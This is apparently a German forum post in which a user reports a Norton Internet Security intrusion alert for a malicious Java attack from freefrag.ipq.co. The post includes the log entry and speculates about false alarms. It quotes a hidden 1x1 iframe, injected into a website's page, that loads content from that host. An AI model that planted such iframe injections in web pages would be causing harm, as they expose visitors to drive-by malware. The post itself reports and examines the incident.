Nur zur Info: Bei mir schon, gerade eben, und zwar vor dem Einloggen, wenn noch die erweiterte Werbung aktiv ist (NIS 2011):
Kategorie:Intrusion Prevention
Datum/Uhrzeit,Risiko,Aktivität,Status,Empfohlene Aktion,Name des Risikos,Angreifender Computer,Angreifer-URL,Zieladresse,Quelladresse,Beschreibung des Datenverkehrs
01.05.2011 00:23,Hoch,Ein Eindringversuch von freefrag.ipq.co wurde blockiert.,Blockiert,Keine Aktion erforderlich,Web Attack: Malicious Java Activity 5,"freefrag.ipq.co (69.64.95.59, 80)",freefrag.ipq.co/enc/jv.html,"...",69.64.95.59 (69.64.95.59),"TCP, www-http"
P.S. Was ich jetzt nicht verstehe: Der Iframe ist aktuell immer noch drin (auch jetzt, wo ich diesen Post editiere), aber NIS spring nicht mehr an???
Code:
<!-- logo --><iframe src="http://freefrag.ipq.co/index.php?ref=15" height="1" width="1" frameborder="0"></iframe>
Alles sehr merkwürdig. Vielleicht springt NIS ja nur dann an, wenn diese URL irgendeinen Inhalt zurückliefert. Einfach so aufgerufen liefert sie nämlich momentan bei mir nur eine leere Seite (noch nicht mal HTML, sondern wirklich 0 Bytes Nutzdaten).
Nachtrag: Ich sehe gerade im Sicherheitsverlauf von NIS, dass kurz
nach dem Alarm ein Update der Intrusion Prevention gemacht wurde ("Intrusion Prevention-Engine: 4.8.0.20 Version des Definitionssatzes: 20110429.002"). Vielleicht war es ja wirklich ein Fehlalarm, den Symantec jetzt korrigiert hat.
Nachtrag zum Nachtrag: Die im Alarm angegebene URL (freefrag.ipq.co/enc/jv.html) führt bei mir immer noch zum gleichen Alarm von NIS, also scheint da wohl wirklich was nicht vertrauenswürdiges zu liegen. Die URL im Iframe scheint also vielleicht zufallsgesteuert/selektiv auf irgendwelche anderen URLs weiterzuleiten???